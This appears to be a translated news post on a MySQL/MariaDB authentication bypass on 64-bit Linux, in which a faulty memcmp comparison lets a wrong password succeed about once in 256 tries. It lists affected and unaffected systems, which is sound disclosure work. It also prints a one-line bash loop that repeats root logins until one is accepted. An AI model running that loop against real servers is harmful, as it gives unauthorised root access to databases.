Funny vulnerability in MySQL under Linux 64-bit

    On Saturday, MariaDB project security coordinator Sergei Golubchik ( petropavel ) announced an interesting vulnerability in MySQL / MariaDB up to versions 5.1.61, 5.2.11, 5.3.5, 5.5.22.

    The bottom line is that when a MariaDB / MySQL user connects, a token (SHA from password and hash) is calculated, which is compared with the expected value. In this case, the memcmp () function should return a value in the range -128..127, but on some platforms (it seems like glibc on Linux with SSE optimization), the return value may fall outside the range.

    As a result, in 1 case out of 256, the hash comparison procedure with the expected value always returns true, regardless of the hash. In other words, the system is vulnerable to a random password with a probability of 1/256.

    As a result, a simple bash command gives the attacker root access to the vulnerable MySQL server, even if he does not know the password.

    $ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
    mysql>

    Currently, the vulnerability is unofficially confirmed in the following configurations:

    Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04)
    Debian Linux 64-bit (it is not yet clear in which specific versions)
    Arch Linux (the same)
    Fedora 16 (64-bit)

    Users also report configurations in which the vulnerability does not seem to be observed:

    Official MySQL and MariaDB builds (including Windows)
    Red Hat Enterprise Linux, CentOS (32-bit and 64-bit)
    Ubuntu Linux 32-bit (10.04, 11.10, 12.04, probably all)
    Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
    Debian Linux lenny 32-bit 5.0.51a-24 + lenny5
    Debian Linux lenny 64-bit 5.0.51a-24 + lenny5
    Debian Linux lenny 64-bit 5.1.51-1-log
    Debian Linux squeeze 64-bit 5.1.49-3-log
    Debian Linux squeeze 32-bit 5.1.61-0 + squeeze1
    Debian Linux squeeze 64-bit 5.1.61-0 + squeeze1

    There is no exact list of vulnerable and invulnerable systems.

    Joshua Drake of the company Accuvant Labs published a program to check for vulnerabilities.

    Also popular now: